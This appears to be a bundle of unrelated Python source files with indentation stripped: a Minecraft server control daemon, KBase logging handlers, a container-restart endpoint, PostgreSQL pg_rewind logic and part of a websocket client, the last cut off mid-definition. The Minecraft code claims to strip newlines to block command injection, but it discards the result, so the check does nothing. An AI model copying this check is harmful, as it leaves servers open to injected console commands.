line = None
while mc_running():
# Grab a new line if we're not holding onto a failed send
if not line:
# Try reading a line. If this fails, check that the proc didn't die
try:
line = proc.stdout.readline()
except BrokenPipeError:
print('reader: Pipe read failed!')
continue # Top loop will handle dead process, otherwise we retry
# Check that we have something to send
if line:
# Wait for a connection to be established
while not conn or conn.closed:
time.sleep(10) # wait for the connection to come back up
# Try to send the thing
try:
conn.send(f'LOG |{bytes.decode(line)}')
line = None
# If we fail, close the connection (remote probably disconnected) and leave the
# line so we can retry it
except OSError:
print('reader: Client disconnected!')
conn.close()
print('reader: Process exited. Exiting reader thread.')
# Start up the reader thread
reader = threading.Thread(target=read_thread)
reader.daemon = True
reader.start()
return True
def mc_stop():
"""
Cleanly save and stop the currently running Minecraft server, if any
Returns:
True if successful, False otherwise (e.g. if server isn't running)
"""
global proc
if not mc_running():
return False
else:
mc_writeline('stop')
# wait to stop
while proc.poll() is None:
time.sleep(1)
proc = None
return True
def mc_whitelist(name, add):
"""
Add a user to or remove a user from the whitelist
Args:
name: The name of the user to be added or removed
add: If set to True, add the user, else remove
Returns:
True if successful, false otherwise (e.g if the server is not running)
"""
result = False
if mc_running():
if add:
result = mc_writeline(f'whitelist add {name}')
mc_writeline('whitelist reload')
else:
result = mc_writeline(f'whitelist remove {name}')
mc_writeline('whitelist reload')
mc_ls_whitelist() # Print the whitelist so we can verify the operation
return result
def mc_ls_whitelist():
"""
Have the server print the current whitelist to the log
Returns:
True if successful, false otherwise (e.g if the server is not running)
"""
result = False
if mc_running():
result = mc_writeline('whitelist list')
return result
def mc_command(cmd, args):
"""
Interpret a command given by the client (serverbot) and execute the appropriate action
Args:
cmd: The command to run
args: (Optional) Any optional arguments to the command
"""
# Remove newlines to prevent command injection
if args is not None:
args.replace('\n','')
print(f'mc_command: {cmd} {args}')
help_msg = ('ServerBot Minecraft commands:\n'
f'!{MC_PREFIX} help - print this message\n'
f'!{MC_PREFIX} ping - ping the server\n'
f'!{MC_PREFIX} status - check the server status\n'
f'!{MC_PREFIX} start - start the server\n'
f'!{MC_PREFIX} stop - stop the server\n'
f'!{MC_PREFIX} whitelist <add|remove|list> [player] - list or modify the whitelist')
# f'!{MC_PREFIX} cmd <command> - send command to the server\n'
# Print help message
if cmd == 'help':
try_send(f'OK |{help_msg}')
# Start the server
elif cmd == 'start':
result = mc_start()
if result:
try_send('OK |Minecraft server started')
elif mc_running():
try_send('ERR |Minecraft server is already running')
else:
try_send('ERR |Unable to start Minecraft server')
# Stop the server
elif cmd == 'stop':
result = mc_stop()
if result:
try_send('OK |Minecraft server stopped')
elif mc_running():
try_send('ERR |Unable to stop Terraria server')
else:
try_send('ERR |Minecraft Server is not running')
# Ping
elif cmd == 'ping':
try_send(f'OK |pong')
# Print the server status
elif cmd == 'status':
if mc_running():
try_send('OK |Minecraft Server is running')
else:
try_send('OK |Minecraft Server is not running')
# Add, remove, or show the whitelist
elif cmd == 'whitelist':
if args:
# Parse the extra args
arglist = args.split()
wl_cmd = arglist[0]
wl_name = None
if len(arglist) == 2:
wl_name = arglist[1]
# Show the whitelist
if wl_cmd == 'list':
result = mc_ls_whitelist()
if result:
try_send('OK |Success - check the log for current whitelist')
else:
try_send('ERR |Minecraft Server is not running')
return
# Add a user
if wl_cmd == 'add' and wl_name:
result = mc_whitelist(wl_name, True)
if result:
try_send('OK |Change submitted - check the log for success')
else:
try_send('ERR |Minecraft Server is not running')
return
# Remove a user
elif wl_cmd == 'remove' and wl_name:
result = mc_whitelist(wl_name, False)
if result:
try_send('OK |Change submitted - check the log for success')
else:
try_send('ERR |Minecraft Server is not running')
return
# We didn't hit any valid cases
try_send(f'ERR |Usage: !mc whitelist <add|remove|list> [player]')
# # Send an arbitrary command to the server
# elif cmd == 'cmd':
# if proc:
# mc_writeline(args)
# try_send('OK |')
# else:
# try_send('ERR |Minecraft Server is not running')
# We didn't get a valid command
else:
try_send(f'ERR |Unknown command: {cmd}')
try_send(f'OK |{help_msg}')
# Main
if __name__ == '__main__':
# Open IPC channel
listener = mpc.Listener(('localhost', MCC_PORT), authkey=SECRET)
while True:
# Wait until we connect to a client (serverbot)
try:
conn = listener.accept()
except (EOFError, ConnectionResetError, BrokenPipeError):
print('main: Failed to connect to client')
continue
print('main: Client connected!')
# If connection succeeded, listen for incoming commands
while conn and (not conn.closed):
# Try the receive a command and execute it. If there's a failure, we assume the
# conneciton failed and close it (in order to reopen it)
try:
line = conn.recv()
tokens = line.split(None, 1)
cmd = tokens[0]
args = None
if len(tokens) > 1:
args = tokens[1].rstrip()
mc_command(cmd, args)
except (EOFError, ConnectionResetError, BrokenPipeError):
print(f'main: Client disconnected!')
conn.close()
|
kblogging.py
|
"""
Common narrative logging functions.
To log an event with proper metadata and formatting use 'log_event':
You can also do free-form logs, but these will be ignored by
most upstream consumers.
"""
__author__ = 'Dan Gunter <dkgunter@lbl.gov>'
__date__ = '2014-07-31'
import collections
import logging
from logging import handlers
import os
import threading
import time
# Local
from .util import kbase_env
from . import log_proxy
from .log_common import format_event
## Constants
KBASE_TMP_DIR = "/tmp"
KBASE_TMP_LOGFILE = os.path.join(KBASE_TMP_DIR, "kbase-narrative.log")
# env var with location of proxy config file
KBASE_PROXY_ENV = 'KBASE_PROXY_CONFIG'
## Internal logging
_log = logging.getLogger("tornado.application")
# WTF is going on logging
#def _logdbg(m):
# open("/tmp/wtf", "a").write(m + "\n")
## External functions
def get_logger(name="", init=False):
"""Get a given KBase log obj.
:param name: name (a.b.c) of the logging namespace, which may be
relative or absolute (starting with 'biokbase.'), or
empty in which case the 'biokbase' logger is returned
:param init: If true, re-initialize the file/socket log handlers
:return: Log object
:rtype: LogAdapter
"""
if init:
reset_handlers()
return logging.getLogger(_kbase_log_name(name))
def log_event(log, event, mapping):
"""Log an event and a mapping.
For example::
log_event(_log, "collision", {"who":"unstoppable force",
"with":"immovable object", "where":"kbase"})
"""
msg = format_event(event, mapping)
log.info(msg)
## Internal functions and classes
def _kbase_log_name(name):
"""Smarter name of KBase logger."""
# no name => root
if not name:
return "biokbase"
# absolute name
if name.startswith("biokbase."):
return name
# relative name
return "biokbase." + name
def _has_handler_type(log, type_):
return any(map(lambda h: isinstance(h, type_), log.handlers))
## Custom handlers
class BufferedSocketHandler(handlers.SocketHandler):
"""Buffer up messages to a socket, sending them asynchronously.
Starts a separate thread to pull messages off and send them.
Ignores any messages that did not come from `log_event()`, above.
"""
def __init__(self, *args):
handlers.SocketHandler.__init__(self, *args)
self._dbg = _log.isEnabledFor(logging.DEBUG)
if self._dbg:
_log.debug("Created SocketHandler with args = {}".format(args))
self.buf = collections.deque([], 100)
self.buf_lock = threading.Lock()
# start thread to send data from buffer
self.thr = threading.Thread(target=self.emitter)
self.thr.daemon = True
self._stop = False
self.extra = {}
self.thr.start()
def close(self):
if self.thr:
self._stop = True
self.thr.join()
self.thr = None
handlers.SocketHandler.close(self)
def emitter(self):
while not self._stop:
try:
self.buf_lock.acquire()
item = self.buf.popleft()
if not self._emit(item):
self.buf.appendleft(item)
self.buf_lock.release()
time.sleep(0.1)
else:
self.buf_lock.release()
except IndexError:
self.buf_lock.release()
time.sleep(0.1)
def emit(self, record):
if self._skip(record):
return
# stuff 'extra' from environment into record
#_logdbg("@@ stuffing into record: {}".format(kbase_env))
record.__dict__.update(kbase_env)
self.buf_lock.acquire()
try:
self.buf.append(record)
finally:
self.buf_lock.release()
def _skip(self, record):
"""Return True if this record should not go to a socket"""
# Do not forward records that didn't get logged through
# kblogging.log_event
if record.funcName != 'log_event':
if self._dbg:
_log.debug("Skip: funcName {} != log_event"
.format(record.funcName))
return
def _emit(self, record):
"""Re-implement to return a success code."""
success = False
try:
s = self.makePickle(record)
self.send(s)
success = True
except (KeyboardInterrupt, SystemExit):
raise
except Exception as err:
_log.debug("Emit record to socket failed: {}".format(err))
self.handleError(record)
if success and _log.isEnabledFor(logging.DEBUG):
_log.debug("Record sent to socket")
return success
def init_handlers():
"""Initialize and add the log handlers.
We only allow one FileHandler and one SocketHandler to exist,
no matter how many times this is called.
"""
# Turn on debugging by setting environment variable KBASE_DEBUG.
if os.environ.get("KBASE_DEBUG", None):
g_log.setLevel(logging.DEBUG)
else:
g_log.setLevel(logging.INFO)
if not _has_handler_type(g_log, logging.FileHandler):
hndlr = logging.FileHandler(KBASE_TMP_LOGFILE)
fmtr = logging.Formatter("%(levelname)s %(asctime)s %(name)s %(message)s")
hndlr.setFormatter(fmtr)
g_log.addHandler(hndlr)
if not _has_handler_type(g_log, handlers.SocketHandler):
cfg = get_proxy_config()
g_log.debug("Opening socket to proxy at {}:{}".format(
cfg.host, cfg.port))
sock_handler = BufferedSocketHandler(cfg.host, cfg.port)
g_log.addHandler(sock_handler)
def get_proxy_config():
config_file = os.environ.get(KBASE_PROXY_ENV, None)
if config_file:
_log.info("Configuring KBase logging from file '{}'".format(config_file))
else:
_log.warn("Configuring KBase logging from defaults ({} is empty, or not found)"
.format(KBASE_PROXY_ENV))
# return log_proxy.ProxyConfiguration(config_file)
return log_proxy.ProxyConfigurationWrapper(config_file)
def reset_handlers():
"""Remove & re-add all handlers."""
while g_log.handlers:
g_log.removeHandler(g_log.handlers.pop())
init_handlers()
## Run the rest of this on import
# Get root log obj.
g_log = get_logger()
# If no handlers, initialize them
if not g_log.handlers:
init_handlers()
class NarrativeUIError(object):
"""Created by Narrative UI javascript on an error.
"""
ui_log = get_logger("narrative_ui")
def __init__(self, is_fatal, where="unknown location", what="unknown condition"):
info = {"function": where, "msg": what}
msg = format_event("ui.error", info)
log_method = (self.ui_log.error, self.ui_log.critical)[is_fatal]
log_method(msg)
|
control.py
|
import asyncio
import os
import logging
from time import sleep
import aiohttp
from aiohttp import web
from threading import Thread
log = logging.getLogger(__name__)
def do_restart():
""" This is the (somewhat) synchronous method to use to do a restart.
It actually starts a thread that does the restart. `__wait_and_restart`,
on the other hand, should not be called directly, because it will block
until the system restarts.
"""
Thread(target=__wait_and_restart).start()
def __wait_and_restart():
""" Delay and then execute the restart. Do not call directly. Instead, call
`do_restart()`.
"""
log.info('Restarting server')
sleep(1)
# We can use the default event loop here because this
# is actually running in a thread. We use aiohttp here because urllib is
# painful and we don’t have `requests`.
loop = asyncio.new_event_loop()
loop.run_until_complete(_resin_supervisor_restart())
async def _resin_supervisor_restart():
""" Execute a container restart by requesting it from the supervisor.
Note that failures here are returned but most likely will not be
sent back to the caller, since this is run in a separate workthread.
If the system is not responding, look for these log messages.
"""
supervisor = os.environ.get('RESIN_SUPERVISOR_ADDRESS',
'http://127.0.0.1:48484')
restart_url = supervisor + '/v1/restart'
api = os.environ.get('RESIN_SUPERVISOR_API_KEY', 'unknown')
app_id = os.environ.get('RESIN_APP_ID', 'unknown')
async with aiohttp.ClientSession() as session:
async with session.post(restart_url,
params={'apikey': api},
json={'appId': app_id,
'force': True}) as resp:
body = await resp.read()
if resp.status != 202:
log.error("Could not shut down: {}: {}"
.format(resp.status, body))
async def restart(request):
"""
Returns OK, then waits approximately 1 second and restarts container
"""
do_restart()
return web.json_response({"message": "restarting"})
|
rewind.py
|
import logging
import os
import shlex
import six
import subprocess
from threading import Lock, Thread
from .connection import get_connection_cursor
from .misc import parse_history, parse_lsn
from ..async_executor import CriticalTask
from ..dcs import Leader
logger = logging.getLogger(__name__)
REWIND_STATUS = type('Enum', (), {'INITIAL': 0, 'CHECKPOINT': 1, 'CHECK': 2, 'NEED': 3,
'NOT_NEED': 4, 'SUCCESS': 5, 'FAILED': 6})
def format_lsn(lsn, full=False):
template = '{0:X}/{1:08X}' if full else '{0:X}/{1:X}'
return template.format(lsn >> 32, lsn & 0xFFFFFFFF)
class Rewind(object):
def __init__(self, postgresql):
self._postgresql = postgresql
self._checkpoint_task_lock = Lock()
self.reset_state()
@staticmethod
def configuration_allows_rewind(data):
return data.get('wal_log_hints setting', 'off') == 'on' or data.get('Data page checksum version', '0') != '0'
@property
def can_rewind(self):
""" check if pg_rewind executable is there and that pg_controldata indicates
we have either wal_log_hints or checksums turned on
"""
# low-hanging fruit: check if pg_rewind configuration is there
if not self._postgresql.config.get('use_pg_rewind'):
return False
cmd = [self._postgresql.pgcommand('pg_rewind'), '--help']
try:
ret = subprocess.call(cmd, stdout=open(os.devnull, 'w'), stderr=subprocess.STDOUT)
if ret != 0: # pg_rewind is not there, close up the shop and go home
return False
except OSError:
return False
return self.configuration_allows_rewind(self._postgresql.controldata())
@property
def can_rewind_or_reinitialize_allowed(self):
return self._postgresql.config.get('remove_data_directory_on_diverged_timelines') or self.can_rewind
def trigger_check_diverged_lsn(self):
if self.can_rewind_or_reinitialize_allowed and self._state != REWIND_STATUS.NEED:
self._state = REWIND_STATUS.CHECK
@staticmethod
def check_leader_is_not_in_recovery(conn_kwargs):
try:
with get_connection_cursor(connect_timeout=3, options='-c statement_timeout=2000', **conn_kwargs) as cur:
cur.execute('SELECT pg_catalog.pg_is_in_recovery()')
if not cur.fetchone()[0]:
return True
logger.info('Leader is still in_recovery and therefore can\'t be used for rewind')
except Exception:
return logger.exception('Exception when working with leader')
def _get_checkpoint_end(self, timeline, lsn):
"""The checkpoint record size in WAL depends on postgres major version and platform (memory alignment).
Hence, the only reliable way to figure out where it ends, read the record from file with the help of pg_waldump
and parse the output. We are trying to read two records, and expect that it wil fail to read the second one:
`pg_waldump: fatal: error in WAL record at 0/182E220: invalid record length at 0/182E298: wanted 24, got 0`
The error message contains information about LSN of the next record, which is exactly where checkpoint ends."""
cmd = self._postgresql.pgcommand('pg_{0}dump'.format(self._postgresql.wal_name))
lsn8 = format_lsn(lsn, True)
lsn = format_lsn(lsn)
env = os.environ.copy()
env.update(LANG='C', LC_ALL='C', PGDATA=self._postgresql.data_dir)
try:
waldump = subprocess.Popen([cmd, '-t', str(timeline), '-s', lsn, '-n', '2'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env)
out, err = waldump.communicate()
waldump.wait()
except Exception as e:
logger.error('Failed to execute `%s -t %s -s %s -n 2`: %r', cmd, timeline, lsn, e)
else:
out = out.decode('utf-8').rstrip().split('\n')
err = err.decode('utf-8').rstrip().split('\n')
pattern = 'error in WAL record at {0}: invalid record length at '.format(lsn)
if len(out) == 1 and len(err) == 1 and ', lsn: {0}, prev '.format(lsn8) in out[0] and pattern in err[0]:
i = err[0].find(pattern) + len(pattern)
j = err[0].find(": wanted ", i)
if j > -1:
try:
return parse_lsn(err[0][i:j])
except Exception as e:
logger.error('Failed to parse lsn %s: %r', err[0][i:j], e)
logger.error('Failed to parse `%s -t %s -s %s -n 2` output', cmd, timeline, lsn)
logger.error(' stdout=%s', '\n'.join(out))
logger.error(' stderr=%s', '\n'.join(err))
return 0
def _get_local_timeline_lsn_from_controldata(self):
in_recovery = timeline = lsn = None
data = self._postgresql.controldata()
try:
if data.get('Database cluster state') == 'shut down in recovery':
in_recovery = True
lsn = data.get('Minimum recovery ending location')
timeline = int(data.get("Min recovery ending loc's timeline"))
if lsn == '0/0' or timeline == 0: # it was a master when it crashed
data['Database cluster state'] = 'shut down'
if data.get('Database cluster state') == 'shut down':
in_recovery = False
lsn = data.get('Latest checkpoint location')
timeline = int(data.get("Latest checkpoint's TimeLineID"))
except (TypeError, ValueError):
logger.exception('Failed to get local timeline and lsn from pg_controldata output')
if lsn is not None:
try:
lsn = parse_lsn(lsn)
except (IndexError, ValueError) as e:
logger.error('Exception when parsing lsn %s: %r', lsn, e)
lsn = None
return in_recovery, timeline, lsn
def _get_local_timeline_lsn(self):
if self._postgresql.is_running(): # if postgres is running - get timeline from replication connection
in_recovery = True
timeline = self._postgresql.received_timeline() or self._postgresql.get_replica_timeline()
lsn = self._postgresql.replayed_location()
else: # otherwise analyze pg_controldata output
in_recovery, timeline, lsn = self._get_local_timeline_lsn_from_controldata()
log_lsn = format_lsn(lsn) if isinstance(lsn, six.integer_types) else lsn
logger.info('Local timeline=%s lsn=%s', timeline, log_lsn)
return in_recovery, timeline, lsn
@staticmethod
def _log_master_history(history, i):
start = max(0, i - 3)
end = None if i + 4 >= len(history) else i + 2
history_show = []
def format_history_line(line):
return '{0}\t{1}\t{2}'.format(line[0], format_lsn(line[1]), line[2])
for line in history[start:end]:
history_show.append(format_history_line(line))
if line != history[-1]:
history_show.append('...')
history_show.append(format_history_line(history[-1]))
logger.info('master: history=%s', '\n'.join(history_show))
def _conn_kwargs(self, member, auth):
ret = member.conn_kwargs(auth)
if not ret.get('database'):
ret['database'] = self._postgresql.database
return ret
def _check_timeline_and_lsn(self, leader):
in_recovery, local_timeline, local_lsn = self._get_local_timeline_lsn()
if local_timeline is None or local_lsn is None:
return
if isinstance(leader, Leader):
if leader.member.data.get('role') != 'master':
return
# standby cluster
elif not self.check_leader_is_not_in_recovery(self._conn_kwargs(leader, self._postgresql.config.replication)):
return
history = need_rewind = None
try:
with self._postgresql.get_replication_connection_cursor(**leader.conn_kwargs()) as cur:
cur.execute('IDENTIFY_SYSTEM')
master_timeline = cur.fetchone()[1]
logger.info('master_timeline=%s', master_timeline)
if local_timeline > master_timeline: # Not always supported by pg_rewind
need_rewind = True
elif local_timeline == master_timeline:
need_rewind = False
elif master_timeline > 1:
cur.execute('TIMELINE_HISTORY %s', (master_timeline,))
history = bytes(cur.fetchone()[1]).decode('utf-8')
logger.debug('master: history=%s', history)
except Exception:
return logger.exception('Exception when working with master via replication connection')
if history is not None:
history = list(parse_history(history))
for i, (parent_timeline, switchpoint, _) in enumerate(history):
if parent_timeline == local_timeline:
# We don't need to rewind when:
# 1. for replica: replayed location is not ahead of switchpoint
# 2. for the former primary: end of checkpoint record is the same as switchpoint
if in_recovery:
need_rewind = local_lsn > switchpoint
elif local_lsn >= switchpoint:
need_rewind = True
else:
need_rewind = switchpoint != self._get_checkpoint_end(local_timeline, local_lsn)
break
elif parent_timeline > local_timeline:
break
self._log_master_history(history, i)
self._state = need_rewind and REWIND_STATUS.NEED or REWIND_STATUS.NOT_NEED
def rewind_or_reinitialize_needed_and_possible(self, leader):
if leader and leader.name != self._postgresql.name and leader.conn_url and self._state == REWIND_STATUS.CHECK:
self._check_timeline_and_lsn(leader)
return leader and leader.conn_url and self._state == REWIND_STATUS.NEED
def __checkpoint(self, task, wakeup):
try:
result = self._postgresql.checkpoint()
except Exception as e:
result = 'Exception: ' + str(e)
with task:
task.complete(not bool(result))
if task.result:
wakeup()
def ensure_checkpoint_after_promote(self, wakeup):
"""After promote issue a CHECKPOINT from a new thread and asynchronously check the result.
In case if CHECKPOINT failed, just check that timeline in pg_control was updated."""
if self._state == REWIND_STATUS.INITIAL and self._postgresql.is_leader():
with self._checkpoint_task_lock:
if self._checkpoint_task:
with self._checkpoint_task:
if self._checkpoint_task.result:
self._state = REWIND_STATUS.CHECKPOINT
if self._checkpoint_task.result is not False:
return
else:
self._checkpoint_task = CriticalTask()
return Thread(target=self.__checkpoint, args=(self._checkpoint_task, wakeup)).start()
if self._postgresql.get_master_timeline() == self._postgresql.pg_control_timeline():
self._state = REWIND_STATUS.CHECKPOINT
def checkpoint_after_promote(self):
return self._state == REWIND_STATUS.CHECKPOINT
def _fetch_missing_wal(self, restore_command, wal_filename):
cmd = ''
length = len(restore_command)
i = 0
while i < length:
if restore_command[i] == '%' and i + 1 < length:
i += 1
if restore_command[i] == 'p':
cmd += os.path.join(self._postgresql.wal_dir, wal_filename)
elif restore_command[i] == 'f':
cmd += wal_filename
elif restore_command[i] == 'r':
cmd += '000000010000000000000001'
elif restore_command[i] == '%':
cmd += '%'
else:
cmd += '%'
i -= 1
else:
cmd += restore_command[i]
i += 1
logger.info('Trying to fetch the missing wal: %s', cmd)
return self._postgresql.cancellable.call(shlex.split(cmd)) == 0
def _find_missing_wal(self, data):
# could not open file "$PGDATA/pg_wal/0000000A00006AA100000068": No such file or directory
pattern = 'could not open file "'
for line in data.decode('utf-8').split('\n'):
b = line.find(pattern)
if b > -1:
b += len(pattern)
e = line.find('": ', b)
if e > -1 and '/' in line[b:e]:
waldir, wal_filename = line[b:e].rsplit('/', 1)
if waldir.endswith('/pg_' + self._postgresql.wal_name) and len(wal_filename) == 24:
return wal_filename
def pg_rewind(self, r):
# prepare pg_rewind connection
env = self._postgresql.config.write_pgpass(r)
env.update(LANG='C', LC_ALL='C', PGOPTIONS='-c statement_timeout=0')
dsn = self._postgresql.config.format_dsn(r, True)
logger.info('running pg_rewind from %s', dsn)
restore_command = self._postgresql.config.get('recovery_conf', {}).get('restore_command') \
if self._postgresql.major_version < 120000 else self._postgresql.get_guc_value('restore_command')
cmd = [self._postgresql.pgcommand('pg_rewind')]
if self._postgresql.major_version >= 130000 and restore_command:
cmd.append('--restore-target-wal')
cmd.extend(['-D', self._postgresql.data_dir, '--source-server', dsn])
while True:
results = {}
ret = self._postgresql.cancellable.call(cmd, env=env, communicate=results)
logger.info('pg_rewind exit code=%s', ret)
if ret is None:
return False
logger.info(' stdout=%s', results['stdout'].decode('utf-8'))
logger.info(' stderr=%s', results['stderr'].decode('utf-8'))
if ret == 0:
return True
if not restore_command or self._postgresql.major_version >= 130000:
return False
missing_wal = self._find_missing_wal(results['stderr']) or self._find_missing_wal(results['stdout'])
if not missing_wal:
return False
if not self._fetch_missing_wal(restore_command, missing_wal):
logger.info('Failed to fetch WAL segment %s required for pg_rewind', missing_wal)
return False
def execute(self, leader):
if self._postgresql.is_running() and not self._postgresql.stop(checkpoint=False):
return logger.warning('Can not run pg_rewind because postgres is still running')
# prepare pg_rewind connection
r = self._conn_kwargs(leader, self._postgresql.config.rewind_credentials)
# 1. make sure that we are really trying to rewind from the master
# 2. make sure that pg_control contains the new timeline by:
# running a checkpoint or
# waiting until Patroni on the master will expose checkpoint_after_promote=True
checkpoint_status = leader.checkpoint_after_promote if isinstance(leader, Leader) else None
if checkpoint_status is None: # master still runs the old Patroni
leader_status = self._postgresql.checkpoint(self._conn_kwargs(leader, self._postgresql.config.superuser))
if leader_status:
return logger.warning('Can not use %s for rewind: %s', leader.name, leader_status)
elif not checkpoint_status:
return logger.info('Waiting for checkpoint on %s before rewind', leader.name)
elif not self.check_leader_is_not_in_recovery(r):
return
if self.pg_rewind(r):
self._state = REWIND_STATUS.SUCCESS
elif not self.check_leader_is_not_in_recovery(r):
logger.warning('Failed to rewind because master %s become unreachable', leader.name)
else:
logger.error('Failed to rewind from healty master: %s', leader.name)
for name in ('remove_data_directory_on_rewind_failure', 'remove_data_directory_on_diverged_timelines'):
if self._postgresql.config.get(name):
logger.warning('%s is set. removing...', name)
self._postgresql.remove_data_directory()
self._state = REWIND_STATUS.INITIAL
break
else:
self._state = REWIND_STATUS.FAILED
return False
def reset_state(self):
self._state = REWIND_STATUS.INITIAL
with self._checkpoint_task_lock:
self._checkpoint_task = None
@property
def is_needed(self):
return self._state in (REWIND_STATUS.CHECK, REWIND_STATUS.NEED)
@property
def executed(self):
return self._state > REWIND_STATUS.NOT_NEED
@property
def failed(self):
return self._state == REWIND_STATUS.FAILED
def read_postmaster_opts(self):
"""returns the list of option names/values from postgres.opts, Empty dict if read failed or no file"""
result = {}
try:
with open(os.path.join(self._postgresql.data_dir, 'postmaster.opts')) as f:
data = f.read()
for opt in data.split('" "'):
if '=' in opt and opt.startswith('--'):
name, val = opt.split('=', 1)
result[name.strip('-')] = val.rstrip('"\n')
except IOError:
logger.exception('Error when reading postmaster.opts')
return result
def single_user_mode(self, communicate=None, options=None):
"""run a given command in a single-user mode. If the command is empty - then just start and stop"""
cmd = [self._postgresql.pgcommand('gaussdb'), '--single', '-D', self._postgresql.data_dir]
for opt, val in sorted((options or {}).items()):
cmd.extend(['-c', '{0}={1}'.format(opt, val)])
# need a database name to connect
cmd.append('template1')
return self._postgresql.cancellable.call(cmd, communicate=communicate)
def cleanup_archive_status(self):
status_dir = os.path.join(self._postgresql.wal_dir, 'archive_status')
try:
for f in os.listdir(status_dir):
path = os.path.join(status_dir, f)
try:
if os.path.islink(path):
os.unlink(path)
elif os.path.isfile(path):
os.remove(path)
except OSError:
logger.exception('Unable to remove %s', path)
except OSError:
logger.exception('Unable to list %s', status_dir)
def ensure_clean_shutdown(self):
self.cleanup_archive_status()
# Start in a single user mode and stop to produce a clean shutdown
opts = self.read_postmaster_opts()
opts.update({'archive_mode': 'on', 'archive_command': 'false'})
self._postgresql.config.remove_recovery_conf()
output = {}
ret = self.single_user_mode(communicate=output, options=opts)
if ret != 0:
logger.error('Crash recovery finished with code=%s', ret)
logger.info(' stdout=%s', output['stdout'].decode('utf-8'))
logger.info(' stderr=%s', output['stderr'].decode('utf-8'))
return ret == 0 or None
|
websocket.py
|
"""
websocket - WebSocket client library for Python
Copyright (C) 2010 Hiroki Ohtani(liris)
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""
import socket
try:
import ssl
from ssl import SSLError
HAVE_SSL = True
except ImportError:
# dummy class of SSLError for ssl none-support environment.
class SSLError(Exception):
pass
HAVE_SSL = False
from streamlink.compat import urlparse, range, is_py3
import os
import array
import struct
import uuid
import hashlib
import base64
import threading
import time
import logging
import traceback
import sys
"""
websocket python client.
=========================
This version support only hybi-13.
Please see http://tools.ietf.org/html/rfc6455 for protocol.
"""
# websocket supported version.
VERSION = 13
# closing frame status codes.
STATUS_NORMAL = 1000
STATUS_GOING_AWAY = 1001
STATUS_PROTOCOL_ERROR = 1002
STATUS_UNSUPPORTED_DATA_TYPE = 1003
STATUS_STATUS_NOT_AVAILABLE = 1005
STATUS_ABNORMAL_CLOSED = 1006
STATUS_INVALID_PAYLOAD = 1007
STATUS_POLICY_VIOLATION = 1008
STATUS_MESSAGE_TOO_BIG = 1009
STATUS_INVALID_EXTENSION = 1010
STATUS_UNEXPECTED_CONDITION = 1011
STATUS_TLS_HANDSHAKE_ERROR = 1015
logger = logging.getLogger()
if is_py3:
unicode = str
class WebSocketException(Exception):
"""
websocket exeception class.
"""
pass
class WebSocketConnectionClosedException(WebSocketException):
"""
If remote host closed the connection or some network error happened,
this exception will be raised.
"""
pass
class WebSocketTimeoutException(WebSocketException):
"""
WebSocketTimeoutException will be raised at socket timeout during read/write data.
"""
pass
default_timeout = None
traceEnabled = False
def enableTrace(tracable):
"""
turn on/off the tracability.
tracable: boolean value. if set True, tracability is enabled.
"""
global traceEnabled
traceEnabled = tracable
if tracable:
if not logger.handlers:
logger.addHandler(logging.StreamHandler())
logger.setLevel(logging.DEBUG)
def setdefaulttimeout(timeout):
"""
Set the global timeout setting to connect.
timeout: default socket timeout time. This value is second.
"""
global default_timeout
default_timeout = timeout
def getdefaulttimeout():
"""
Return the global timeout setting(second) to connect.
"""
return default_timeout
def _parse_url(url):
"""
parse url and the result is tuple of
(hostname, port, resource path and the flag of secure mode)
url: url string.
"""
if ":" not in url:
raise ValueError("url is invalid")
scheme, url = url.split(":", 1)
parsed = urlparse(url, scheme="http")
if parsed.hostname:
hostname = parsed.hostname
else:
raise ValueError("hostname is invalid")
port = 0
if parsed.port:
port = parsed.port
is_secure = False
if scheme == "ws":
if not port:
port = 80
elif scheme == "wss":
is_secure = True
if not port:
port = 443
else:
raise ValueError("scheme %s is invalid" % scheme)
if parsed.path:
resource = parsed.path
else:
resource = "/"
if parsed.query:
resource += "?" + parsed.query
return (hostname, port, resource, is_secure)
def create_connection(url, timeout=None, **options):
"""
connect to url and return websocket object.
Connect to url and return the WebSocket object.
Passing optional timeout parameter will set the timeout on the socket.
If no timeout is supplied, the global default timeout setting returned by getdefauttimeout() is used.
You can customize using 'options'.
If you set "header" list object, you can set your own custom header.
>>> conn = create_connection("ws://echo.websocket.org/",
... header=["User-Agent: MyProgram",
... "x-custom: header"])
timeout: socket timeout time. This value is integer.
if you set None for this value, it means "use default_timeout value"
options: current support option is only "header".
if you set header as dict value, the custom HTTP headers are added.
"""
sockopt = options.get("sockopt", [])
sslopt = options.get("sslopt", {})
websock = WebSocket(sockopt=sockopt, sslopt=sslopt)
websock.settimeout(timeout if timeout is not None else default_timeout)
websock.connect(url, **options)
return websock
_MAX_INTEGER = (1 << 32) - 1
_AVAILABLE_KEY_CHARS = list(range(0x21, 0x2f + 1)) + list(range(0x3a, 0x7e + 1))
_MAX_CHAR_BYTE = (1 << 8) - 1
# ref. Websocket gets an update, and it breaks stuff.
# http://axod.blogspot.com/2010/06/websocket-gets-update-and-it-breaks.html
def _create_sec_websocket_key():
uid = uuid.uuid4()
return base64.encodestring(uid.bytes).strip()
_HEADERS_TO_CHECK = {
"upgrade": "websocket",
"connection": "upgrade",
}
class ABNF(object):
"""
ABNF frame class.
see http://tools.ietf.org/html/rfc5234
and http://tools.ietf.org/html/rfc6455#section-5.2
"""
# operation code values.
OPCODE_CONT = 0x0
OPCODE_TEXT = 0x1
OPCODE_BINARY = 0x2
OPCODE_CLOSE = 0x8
OPCODE_PING = 0x9
OPCODE_PONG = 0xa
# available operation code value tuple
OPCODES = (OPCODE_CONT, OPCODE_TEXT, OPCODE_BINARY, OPCODE_CLOSE,
OPCODE_PING, OPCODE_PONG)
# opcode human readable string
OPCODE_MAP = {
OPCODE_CONT: "cont",
OPCODE_TEXT: "text",
OPCODE_BINARY: "binary",
OPCODE_CLOSE: "close",
OPCODE_PING: "ping",
OPCODE_PONG: "pong"
}
# data length threashold.
LENGTH_7 = 0x7d
LENGTH_16 = 1 << 16
LENGTH_63 = 1 << 63
def __init__(self, fin=0, rsv1=0, rsv2=0, rsv3=0,
